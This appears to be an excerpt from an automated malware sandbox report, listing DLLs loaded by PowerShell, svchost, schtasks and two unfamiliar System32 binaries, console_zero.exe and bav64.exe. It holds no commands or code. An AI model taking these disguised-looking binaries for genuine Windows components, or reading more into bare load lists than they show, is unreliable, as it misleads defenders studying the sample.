    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
